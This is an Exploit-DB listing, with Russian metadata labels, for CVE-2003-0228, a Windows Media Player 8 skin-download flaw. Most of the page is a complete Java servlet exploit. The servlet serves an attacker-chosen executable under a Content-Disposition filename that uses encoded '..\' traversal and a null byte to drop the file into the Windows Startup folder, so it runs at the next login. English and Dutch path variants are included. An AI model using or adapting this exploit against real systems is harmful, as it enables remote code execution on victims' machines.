- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 22570
- Проверка EDB
-
- Пройдено
- Автор
- JELMER KUPERUS
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2003-0228
- Дата публикации
- 2003-05-07
Java:
source: https://www.securityfocus.com/bid/7517/info
Windows Media Player is vulnerable to code execution through skin files. WMP does not properly validate URLs that are passed to initiate a skin file download and installation. This could allow a malicious file advertised as a skin file to be downloaded to a known location and executed through some other means.
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
import java.io.*;
/**
*
* Microsoft media player 8 Exploit for windows XP English and Dutch versions
*
* It will drop a file in the startup folder
*
* modify web.xml to change what will be uploaded
*
* @author Jelmer Kuperus
*
*/
public class MediaPlayerExploit extends HttpServlet {
private static final int BUFFER_SIZE = 1024;
private static final String[] paths = new String[] {
"%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CStart%20Menu%5CPrograms%5CStartup%5c", // English
"%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CMenu Start%5CProgramma%27s%5Copstarten%5c" // Dutch
};
private String payload;
public void init() throws ServletException {
payload = getInitParameter("executable");
}
public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
int language = 0; // default to english
try {
language = Integer.parseInt(request.getParameter("language"));
} catch (NumberFormatException ignored) {}
String path = paths[language];
File file = new File(payload);
ServletOutputStream sos = response.getOutputStream();
response.setContentType("application/download");
response.setHeader("Content-Disposition","filename=" + path + file.getName() + "%00.wmz");
BufferedInputStream bis = new BufferedInputStream(new FileInputStream(file));
BufferedOutputStream bos = new BufferedOutputStream(sos);
byte buffer[] = new byte[BUFFER_SIZE];
int datalength = 0;
while ( (datalength = bis.read(buffer,0,BUFFER_SIZE)) > 0) {
bos.write(buffer,0,datalength);
}
bis.close();
bos.close();
}
public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
doGet(request, response);
}
}
- Источник
- www.exploit-db.com